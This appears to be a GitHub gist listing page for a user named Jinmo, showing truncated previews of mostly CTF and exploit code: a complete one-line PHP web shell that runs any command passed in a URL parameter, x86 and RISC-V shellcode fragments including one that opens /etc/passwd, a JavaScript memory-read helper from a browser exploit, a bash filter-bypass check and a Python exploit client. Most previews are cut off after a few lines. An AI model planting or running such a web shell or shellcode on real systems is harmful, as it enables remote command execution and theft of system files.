Jinmo Jinmo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "pin.H" | |
| #include <stdio.h> | |
| FILE *out_fp; | |
| VOID TraceMove(VOID *addr) { | |
| fprintf(out_fp, "%p: MOV Here!\n", addr); | |
| } | |
| VOID INSAnalysis(INS ins, VOID *v) { | |
| if (INS_Opcode(ins) == XED_ICLASS_MOV) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo 'Shell launched!\n'; | |
| system($_GET[cmd]); | |
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/socket.h> | |
| #include <sys/types.h> | |
| #include <arpa/inet.h> | |
| #include <strings.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| int main(int argc, char **argv, char **envp) { | |
| char buf[256]; | |
| int sockfd = socket(2, 1, 0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jmp a | |
| b: | |
| pop ebx | |
| xor ecx, ecx | |
| xor edx, edx | |
| lea eax, [ecx+5] | |
| int 0x80 | |
| xchg eax, ecx | |
| mov al, 187 | |
| lea ebx, [edx+1] |
Jinmo
/ riscv-readfile.s
Last active
December 23, 2015 04:54
RISCV file read and encryption (4byte xor, for flag length)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # file read shellcode | |
| # riscv | |
| # - buffer: pc + 0x100, must be writable | |
| # - if you want, you can change it | |
| # compile: | |
| # export PATH=$PATH:/opt/riscv/bin | |
| # riscv64-unknown-elf-as code.s -o code.o | |
| # riscv64-unknown-elf-objcopy --dump-section .text=code.dump code.o | |
| # output: code.dump |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| rootdir = 'EDIT_HERE' | |
| for root, subdirs, files in os.walk(rootdir): | |
| for file in files: | |
| if file.endswith('.c') or file.endswith('.h'): | |
| f = open(root + '/' + file, 'rb') | |
| if f.read(3) != '\xEF\xBB\xBF': | |
| try: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script type="text/javascript"> | |
| function qs(addr, read) { | |
| var s = ''; | |
| var i; | |
| var c = 0; | |
| for(i = 0; i < 50; i++) { | |
| c = (read(addr + i - 2) >> 16) & 0xff; | |
| if(c == 0) return s; |
Jinmo
/ gist:087cec3ea791bc6744dd05182855721b
Created
April 5, 2016 14:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function check_space { | |
| if [[ $1 == *[bdks';''&'' ']* ]] | |
| then | |
| return 0 | |
| fi | |
| return 1 | |
| } | |
| while : |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from transaction_pb2 import Transaction, Reply, Command | |
| from rc4 import RC4 # https://github.com/bozhu/RC4-Python | |
| import socket | |
| import hexdump | |
| import random | |
| import struct | |
| import telnetlib | |
| import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .intel_syntax noprefix | |
| .globl _start | |
| _start: | |
| xor ecx, ecx | |
| mul ecx | |
| push ecx | |
| push 0x64777373 | |
| push 0x61702f63 | |
| push 0x74652f2f | |
| mov al, 5 |
OlderNewer